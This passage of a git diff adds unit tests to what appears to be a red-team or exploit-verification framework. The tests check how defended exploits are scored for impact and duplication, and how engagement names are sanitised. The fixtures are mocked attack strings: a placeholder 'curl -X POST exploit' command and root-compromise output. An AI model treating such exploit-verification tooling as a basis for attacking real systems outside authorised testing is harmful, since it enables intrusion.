ReAttackOutcome.ERROR + + +# ── Test 12: impact_patterns populate evidence + reward.impact_confirmed ── + + +async def test_impact_patterns_populate_evidence(tmp_path: Path) -> None: + """impact_patterns matched in PoC output → impact_signals_matched + impact_confirmed.""" + + async def _run(command: str) -> tuple[str, str, int]: + if "exploit" in command.lower() or "PWNED" in command: + return ("PWNED uid=0 root@target", "", 0) + return ("matched", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = ExploitSpec( + finding_ref="FIND-IMP", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + impact_patterns=["uid=0"], + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + assert "uid=0" in evidence.impact_signals_matched + reward = verifier.compute_reward(evidence) + assert reward.impact_confirmed is True + + +# ── Test 13: duplicate detection suppresses second run ──────────────────── + + +async def test_duplicate_detection_suppresses_second(tmp_path: Path) -> None: + """Same fingerprint on second call → duplicate_of set, outcome ERROR.""" + runner = make_runner(poc_response=("PWNED root@target", "", 0)) + verifier = EnvironmentVerifier(tmp_path, runner) + + spec_a = ExploitSpec( + finding_ref="FIND-DUP-A", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + target_host="10.0.0.5", + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + spec_b = ExploitSpec( + finding_ref="FIND-DUP-B", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + target_host="10.0.0.5", + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post_a = await verifier.capture_state(spec_a, phase=CheckPhase.POST_DEFENSE) + _ = await verifier.verify_blocked(spec_a, pre=None, post=post_a) + + post_b = await verifier.capture_state(spec_b, phase=CheckPhase.POST_DEFENSE) + evidence_b = await verifier.verify_blocked(spec_b, pre=None, post=post_b) + assert evidence_b.duplicate_of is not None + assert evidence_b.re_attack_outcome == ReAttackOutcome.ERROR diff --git a/tests/unit/tools/test_complete_planning.py b/tests/unit/tools/test_complete_planning.py new file mode 100644 index 00000000..eb3acbab --- /dev/null +++ b/tests/unit/tools/test_complete_planning.py @@ -0,0 +1,41 @@ +"""Unit tests for ``decepticon.tools.interaction.complete_planning``.""" + +from __future__ import annotations + +from decepticon.tools.interaction.complete_planning import _sanitize_engagement_name + + +def test_sanitize_preserves_valid_slug(): + assert _sanitize_engagement_name("telenor-vdp") == "telenor-vdp" + + +def test_sanitize_empty_returns_fallback(): + assert _sanitize_engagement_name("") == "unnamed-engagement" + + +def test_sanitize_whitespace_only_returns_fallback(): + assert _sanitize_engagement_name(" ") == "unnamed-engagement" + + +def test_sanitize_strips_whitespace(): + assert _sanitize_engagement_name(" my-engagement ") == "my-engagement" + + +def test_sanitize_truncates_long_name(): + long_name = "x" * 100 + result = _sanitize_engagement_name(long_name) + assert len(result) == 64 + assert result == "x" * 64 + + +def test_sanitize_non_string_returns_fallback(): + assert _sanitize_engagement_name(None) == "unnamed-engagement" + assert _sanitize_engagement_name(123) == "unnamed-engagement" + assert _sanitize_engagement_name([]) == "unnamed-engagement" + + +def test_sanitize_preserves_at_boundary(): + """Exactly 64 chars should not be truncated.""" + exact = "a" * 64 + assert _sanitize_engagement_name(exact) == exact + assert len(_sanitize_engagement_name(exact)) == 64